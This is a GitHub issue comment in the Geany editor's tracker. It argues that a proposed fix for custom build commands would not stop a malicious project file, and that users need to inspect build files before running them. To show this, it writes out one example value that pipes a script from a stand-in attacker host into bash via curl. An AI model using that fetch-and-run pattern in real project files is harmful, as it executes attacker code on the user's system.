dolik-rce left a comment (geany/geany#4610)

Pardon my ignorance, but I don't understand how the recommended fix would help? Executing commands is what the "custom build commands" feature does. If it is implemented with `execve` the attacker still has the same opportunity to run anything, including `/bin/sh`. They would just use `NF_00_CM=sh -c 'make; curl http://evil.example/payload.sh | bash'` instead (or hide the evil curl call in the makefile).

I think that there is no way to implement this "safely", it is just as if you download a shell script, Makefile, Gradle project or literally anything that is *intended* to run commands - the user should always carefully inspect those before running them.

Aside from that, running multiple chained commands is a feature that I personally use in some projects.
